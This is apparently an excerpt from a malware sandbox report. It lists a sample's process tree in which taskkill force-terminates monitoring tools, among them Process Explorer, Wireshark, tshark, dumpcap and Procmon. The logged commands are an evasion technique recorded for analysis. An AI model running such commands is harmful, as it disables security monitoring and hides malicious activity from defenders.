C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
PID:812
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F2⤵
- Kills process with taskkill
PID:1584
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F2⤵
- Kills process with taskkill
PID:1400
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F2⤵
- Kills process with taskkill
PID:1124
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F2⤵
- Kills process with taskkill
PID:936
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F2⤵
- Kills process with taskkill
PID:1956
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F2⤵
- Kills process with taskkill
PID:656
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F2⤵
- Kills process with taskkill
PID:2020
-